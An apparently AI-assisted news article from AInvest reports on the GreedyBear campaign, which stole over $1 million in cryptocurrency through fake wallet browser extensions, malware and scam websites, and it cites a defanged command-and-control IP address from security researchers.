AInvest Newsletter
Daily stocks & crypto headlines, free to your inbox
_6ff029a61766633234293.png?format=webp&width=1186&height=250)
GreedyBear Crypto Scammers Steal Over $1 Million with Fake Extensions, Malware, and Scam Websites
ByAinvest
Friday, Aug 8, 2025 4:03 am ET1min read
GreedyBear, a cryptocurrency threat actor group, has stolen over $1 million through a campaign that includes malicious browser extensions, malware, and scam websites. The group has deployed over 650 malicious tools targeting cryptocurrency wallet users and has used AI-generated code to scale and diversify attacks. Koi Security researcher Tuval Admoni described GreedyBear's approach as an industrial-scale crypto theft operation that blends multiple proven attack methods into one coordinated operation.
A newly discovered campaign dubbed GreedyBear has leveraged over 650 malicious tools to steal over $1 million in cryptocurrency. The campaign, which includes malicious browser extensions, malware, and scam websites, has targeted cryptocurrency wallet users and employed AI-generated code to scale and diversify attacks [1].The GreedyBear group has deployed over 150 fake browser extensions that impersonate popular wallets such as MetaMask and TronLink. These extensions are designed to capture user credentials and exfiltrate them to an attacker-controlled server [1]. The campaign also involves distributing malicious executables through various Russian sites, leading to the deployment of credential stealers and ransomware [1].
In addition to browser extensions, GreedyBear has set up scam sites that pose as cryptocurrency products and services. These sites aim to trick users into parting with their wallet credentials or payment details, resulting in credential theft and financial fraud [1].
Koi Security researcher Tuval Admoni described GreedyBear's approach as an industrial-scale crypto theft operation that blends multiple proven attack methods into one coordinated operation [1]. The group's use of a single IP address (185.208.156[.]66) as a command-and-control (C2) server for data collection and management further indicates a well-organized and coordinated effort [1].
The campaign has since evolved to target other browser marketplaces. A Google Chrome extension named Filecoin Wallet has used the same C2 server and underlying logic to pilfer credentials, indicating a broadening of the group's attack scope [1].
The GreedyBear group's tactics are evolving, and they are not deploying a single toolset but rather operating a broad malware distribution pipeline capable of shifting tactics as needed [1]. This adaptability underscores the need for robust cybersecurity measures to protect against such sophisticated threats.
References:
[1] https://thehackernews.com/2025/08/greedybear-steals-1m-in-crypto-using.html
[2] https://en.coinotag.com/greedybear-cybercrime-group-exploits-browser-extensions-and-malware-to-steal-over-1-million-in-crypto/
Ainvest News articles are AI-generated using advanced large language model (LLM) technology designed to analyze and synthesize publicly available data and news. While AI tools assist in producing initial drafts and insights, all AI generated content published on Ainvest is subject to comprehensive human editorial review before publication. A designated human editor reviews, verifies, and approves each article for factual accuracy, coherence, and compliance with AInvest Fintech Inc’s editorial and disclosure standards.
Despite these review procedures, the information provided may still contain inaccuracies, incomplete data, or time sensitive references due to the inherent limitations of AI generated analysis and evolving changes. The material is provided strictly for informational and educational purposes and does not constitute personalized investment, legal, or financial advice. Readers should independently verify all facts, figures, and statements before making any decision based on this content.
AInvest Fintech Inc. its affiliates, and partners accept no liability or responsibility for any direct or consequential losses arising from reliance on this content. All articles and analyses are subject to revision, update, or removal without prior notice to maintain accuracy and integrity in our publications.
Comments
No comments yet